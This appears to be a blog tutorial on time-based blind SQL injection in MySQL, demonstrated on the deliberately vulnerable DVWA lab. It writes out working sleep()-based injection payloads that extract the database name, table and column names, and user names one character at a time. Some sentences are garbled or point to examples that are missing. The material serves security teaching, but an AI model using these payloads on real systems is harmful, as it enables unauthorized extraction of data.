The time-based SQL injection relies on sending an SQL query to the database, which forces the database to wait for a specified amount of time (in seconds) before responding and the response time will indicate to the attacker whether the result of the query is TRUE or FALSE. If the page is not vulnerable, it will load quickly; if it is vulnerable it will take longer than usual to load. This enables the attacker to extract data, even though there are no visible changes on the page.
For example if the database name is "dvwa" then it will delay for 10 seconds, otherwise no delay and if the table name is "users" then it will delay for 5 seconds, or not. So in time-based injection, for a statement that is true, a delay would be included and for a statement that is false, there was no delay or vary little delay would be included. Depending on the database, there are built-in functions available that would delay the response, for example in Mysql sleep() function, in MSSQL server waitfordelay() function, and in postgresql pg_sleep() function.
Now lets look at the basic concepts of how time based sql injection works. I will be testing below commands on mysql console. In mysql database the time-based sql injection is perform sleep() within if() condition. First lets look at sleep() function.
Sleep() function :
The sleep function pause the response of database for given number of seconds. For example :
At above example the would be delayed for 5 seconds.
If() condition :
The structure of if() condition in mysql is :
if(condition, value_if_true, value_if_false)
the above example example will return 40 because the condition (20 > 40) is false. Now lets run the below statement :
select if((select database()) = "dvwa", sleep(5), null);At above statement if the database name is dvwa then it will output for 5 seconds or not.
We can also use the above statement with substr() to enumerate the data from database, for example :
select if(substr((select database()), 1, 1) = "d", sleep(5), null); select if(substr((select database()), 2, 1) = "v", sleep(5), null); select if(substr((select database()), 3, 1) = "w", sleep(5), null); select if(substr((select database()), 4, 1) = "a", sleep(5), null); select if((select database()) like "s%", sleep(2), null); select if((select database()) like "%e$", sleep(3), null); select if((select version()) like "5%", sleep(5), null);Now lets try the above queries with the web application. For demonstration we are going to use DVWA Vulnerable Web App. To know more about DVWA or install it on your system pleas visit the below link :
http://www.sec-art.net/2018/06/how-to-install-dvwadamn-vulnerable-web.html
Now at DVWA we are going to use the SQL Injection (Blind) example for the demostration and also set the security level to low in DVWA.
In this example if we put the user ID then it will show the details of user.
Now lets put the below statement on the user id box.
1' and (select if((database())="dvwa", sleep(5), null)) #
Now as we can see the web application will waiting for the response from the database server, it means that our query is true. We at here we can also enumerate the name of the database one by one character, as we can see in the boolean based injection. For example :
1' and (select if(substr(database(), 1, 1)="d", sleep(5), null)) #
And also with ascii function :
1' and (select if(ascii(substr(database(), 1, 1))="100", sleep(5), null)) #
Some queries are :
1' and (select if((database()) like "d%", sleep(2), null)) # 1' and (select if((version()) like "5%", sleep(5), null)) #Query for extracting table name :
1' and (select if((select substr(table_name, 1, 1) from information_schema.tables where table_schema=database() limit 0, 1)="g", sleep(5), null)) # 1' and (select if((select substr(table_name, 2, 1) from information_schema.tables where table_schema=database() limit 0, 1)="u", sleep(5), null)) #The first table name is guestbook. Also with ascii function :
1' and (select if(ascii((select substr(table_name, 1, 1) from information_schema.tables where table_schema=database() limit 0, 1))="103", sleep(5), null)) #Query for extracting column name :
1' and (select if((select substr(column_name, 1, 1) from information_schema.columns where table_name="guestbook" limit 0, 1)="c", sleep(5), null)) # 1' and (select if((select substr(column_name, 2, 1) from information_schema.columns where table_name="guestbook" limit 0, 1)="o", sleep(5), null)) # 1' and (select if(ascii((select substr(column_name, 1, 1) from information_schema.columns where table_name="guestbook" limit 0, 1))="99", sleep(5), null)) #
Query for extracting users data :
first user name is admin :
1' and (select if((select substr(user, 1, 1) from users limit 0, 1)="a", sleep(5), null)) # 1' and (select if((select substr(user, 2, 1) from users limit 0, 1)="d", sleep(5), null)) # 1' and (select if(ascii((select substr(user, 1, 1) from users limit 0, 1))="97", sleep(5), null)) # 1' and (select if(ascii((select substr(user, 2, 1) from users limit 0, 1))="100", sleep(5), null)) #Also note that this attack is typically slow (especially on large databases) since an attacker would need to enumerate a database character by character.
Conclusion :
In this post we look at some basic concepts of Time-based SQL injection.
For more info/Articles about Web Application Security : http://www.sec-art.net/p/web-security.html